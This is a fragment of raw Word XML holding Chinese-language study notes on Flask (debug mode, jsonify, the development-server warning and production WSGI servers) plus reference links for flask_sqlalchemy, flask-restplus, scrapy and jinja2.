          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>app.run(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="660099"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="JetBrains Mono" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38577A85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0409F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FF5E24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="577" w:name="_Toc159780010"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsonify:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快速生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="577"/>
    </w:p>
    <w:p w14:paraId="67CB45E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C455295" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="578" w:name="_Toc159780011"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渲染前端</w:t>
      </w:r>
      <w:bookmarkEnd w:id="578"/>
    </w:p>
    <w:p w14:paraId="0A7E09A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.csdn.net/qq_37146039/article/details/115603272</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20451852" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://blog.csdn.net/qq_41106517/article/details/112905639</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2D4AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://blog.csdn.net/li_ellin/article/details/107858606</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E652D2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5D46CF" w14:textId="680A8DDD" w:rsidR="00337D07" w:rsidRDefault="00A405C5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="579" w:name="_Toc159780012"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错勿用于生产环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="579"/>
    </w:p>
    <w:p w14:paraId="28723763" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25887B53" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先需要明确的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的警告信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> WARNING: This is a development server. Do not use it in a production deployment. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不是因为你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> debug </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而是因为你正在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自带的开发服务器来运行应用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEFE92E" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D1753C" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自带的服务器是为了开发环境而设计的，所以当你使用它来运行你的应用时，不管</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> debug </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，都会看到这个警告。这是为了提醒开发者不要在生产环境中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置的服务器，因为它不是为生产环境设计的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8B4B73" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DA4DA6" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在生产环境中，你应该使用专门的生产级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器来运行你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用。例如，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> WSGI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gunicorn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> uWSGI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后再使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nginx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器来反向代理到你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> WSGI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E1AF1A" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B072B19" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你只是想消除这个警告，你可以通过在启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用时设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> FLASK_ENV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境变量为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> production </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D2FD3" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF0B85F" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DE0522" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E779D20" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export FLASK_ENV=production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3C22C" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>flask run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCCDAE4" w14:textId="77777777" w:rsidR="00E92AB0" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD0E077" w14:textId="60F62C8D" w:rsidR="00A405C5" w:rsidRDefault="00E92AB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是请记住，这并不意味着你现在正在使用一个生产级别的服务器，它只是把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用的环境设置为了生产环境。在生产环境中，你应该使用一个专门为生产设计的服务器，如上面提到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gunicorn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uWSGI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Nginx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451C074" w14:textId="77777777" w:rsidR="00A405C5" w:rsidRDefault="00A405C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF6C85F" w14:textId="77777777" w:rsidR="00A405C5" w:rsidRDefault="00A405C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C38FAE" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="580" w:name="_Toc159780013"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask_sqlalchemy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="580"/>
    </w:p>
    <w:p w14:paraId="296BE153" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78448820" w14:textId="29DA7E88" w:rsidR="00502108" w:rsidRDefault="00502108" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人感觉，这就是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间，包了一层库而已，不好用，不好写，也不好配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D77DF" w14:textId="77777777" w:rsidR="00502108" w:rsidRDefault="00502108" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB00233" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://wizardforcel.gitbooks.io/flask-extension-docs/content/flask-sqlalchemy.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D511839" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1B174C" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flask-SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:t>是一个为您的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:t>应用增加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:t>支持的扩展。它需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLAlchemy 0.6 </w:t>
      </w:r>
      <w:r>
        <w:t>或者更高的版本。它致力于简化在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:t>的使用，提供了有用的默认值和额外的助手来更简单地完成常见任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0959C196" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53645E73" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C883C24" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21780D2B" w14:textId="77777777" w:rsidR="00337D07" w:rsidRDefault="00337D07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A836374" w14:textId="77777777" w:rsidR="004C452C" w:rsidRPr="00337D07" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8B2AE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF926D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="581" w:name="_Toc159780014"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask-restplus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="581"/>
    </w:p>
    <w:p w14:paraId="775336C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>教程：</w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://flask-restplus.readthedocs.io/en/stable/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E687C9A" w14:textId="763C2A35" w:rsidR="004C452C" w:rsidRDefault="0018061E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="582" w:name="_Toc159780015"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>crapy</w:t>
      </w:r>
      <w:r w:rsidR="00A358C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：网络爬虫框架</w:t>
      </w:r>
      <w:bookmarkEnd w:id="582"/>
    </w:p>
    <w:p w14:paraId="0209C437" w14:textId="77777777" w:rsidR="0018061E" w:rsidRDefault="0018061E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F5DABE" w14:textId="4B96A00C" w:rsidR="004A38CC" w:rsidRDefault="004A38CC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227FCF88" w14:textId="55E871C8" w:rsidR="00A358C6" w:rsidRDefault="004A38CC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004A38CC">
        <w:t>https://docs.scrapy.org/en/latest/intro/tutorial.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798BE40" w14:textId="77777777" w:rsidR="00A358C6" w:rsidRDefault="00A358C6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028CD1EA" w14:textId="77777777" w:rsidR="00A358C6" w:rsidRDefault="00A358C6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768BC972" w14:textId="77777777" w:rsidR="00A358C6" w:rsidRDefault="00A358C6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283F4934" w14:textId="77777777" w:rsidR="00A358C6" w:rsidRDefault="00A358C6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A0CD73" w14:textId="77777777" w:rsidR="0018061E" w:rsidRDefault="0018061E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19810EC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0720417C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="583" w:name="_Toc159780016"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jinja2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="583"/>
    </w:p>
    <w:p w14:paraId="7B7CE213" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://jinja.palletsprojects.com/en/3.1.x/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F9DD4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
